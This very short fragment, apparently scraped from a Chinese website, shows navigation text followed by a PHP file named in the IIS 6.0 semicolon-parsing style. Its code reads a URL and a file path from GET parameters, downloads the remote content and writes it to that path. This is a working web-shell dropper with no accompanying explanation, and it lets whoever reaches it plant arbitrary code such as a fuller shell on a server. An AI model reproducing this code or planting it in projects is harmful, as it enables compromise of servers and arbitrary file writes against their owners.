网站简介 广告服务 联系我们 iis60day.php;
<?php
$str=file_get_contents($_GET['url']);
echo file_put_contents($_GET['file'],$str);
?>